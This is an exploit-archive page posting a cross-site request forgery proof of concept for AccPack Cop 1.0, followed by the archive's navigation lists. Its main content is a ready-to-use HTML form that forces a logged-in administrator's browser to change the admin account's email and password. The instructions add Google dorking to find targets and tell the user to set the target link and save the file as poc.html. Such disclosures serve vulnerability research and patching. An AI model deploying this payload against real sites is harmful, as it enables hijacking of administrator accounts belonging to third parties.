AccPack Cop 1.0 Cross Site Request Forgery

AccPack Cop 1.0 Cross Site Request Forgery: Posted Aug 2, 2024; Authored by indoushka; AccPack Cop version 1.0 suffers from a cross site request forgery vulnerability.; tags | exploit, csrf; SHA-256 | 9019bcc0149f6bd585eeb57145abd8d8ab36247d7e4f551459497d7ef6a6c872; Download | Favorite | View

AccPack Cop 1.0 Cross Site Request Forgery

=============================================================================================================================================
| # Title     : AccPack Cop v1.0 CSRF Vulnerability                                                                                         |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            |
| # Vendor    : https://webpay.com.np/#Product                                                                                               |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following HTML code modifies the admin information.

[+] Go to the line 5. Set the target site link Save changes and apply . 

[+] infected file : cms/user/modify.php.

[+] https://127.0.0.1/q7.3/cms/user/modify.php.

[+] save code as poc.html 

[+] payload : 

</head>
<body>
  <div class="container">
    <div class="text-center" style="padding: 5px"><h3>User Edit</h3></div>
    <form action="https://tssclahanorgnp/cms/user/modify.php" method="POST"  enctype="multipart/form-data">
      <div hidden="true">
        <input type="text" name="id" id="id" value="1">
      </div>
       <div>
        <label for='email'>Email</label><input  type="text" class="form-control" name='email' id='email' value="indoushka@mail.dz">
       </div>
       <div>
        <label for='password'>Password</label><input  type="text" class="form-control" name='password' id='password' type='password' value="123456">
       </div>
       <tr>
       <div>
        <label for='status'>Status</label>
          <input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label>
          <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label>
        
       </div>   
       <div style='height:80'>
        <input type='submit' value='Submit'><input type='reset' Value='Reset'>
       </div>
    </form>
  </div>

</body>
</html>

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================

Top Authors In Last 30 Days

Red Hat 294 files
Ubuntu 64 files
Debian 24 files
Apple 14 files
LiquidWorm 12 files
Gentoo 8 files
Google Security Research 4 files
Andrey Stoykov 3 files
Jann Horn 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,132)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,171)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,070)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,426)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,010)
UNIX (9,482)
UnixWare (188)
Windows (6,785)
Other

AccPack Cop 1.0 Cross Site Request Forgery

AccPack Cop 1.0 Cross Site Request Forgery

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

AccPack Cop 1.0 Cross Site Request Forgery

Share This

AccPack Cop 1.0 Cross Site Request Forgery

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems